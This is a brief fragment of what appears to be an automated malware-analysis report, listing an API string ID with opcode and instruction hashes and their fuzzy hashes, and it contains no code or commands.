                                          • API String ID: 0-120812121
                                          • Opcode ID: c56935a0eb90631a5f2efc0543069aa2723d47141d10be997a949776721356df
                                          • Instruction ID: 485a7d541e875942e129218495a3a6fdd4cca73346f226d068ea73c2821c7f59
                                          • Opcode Fuzzy Hash: c56935a0eb90631a5f2efc0543069aa2723d47141d10be997a949776721356df
                                          • Instruction Fuzzy Hash: CDA1A578644D049FEB94DF68C89CB26B2E5FB5B388F74C49AD09AD71A5DE618C80C703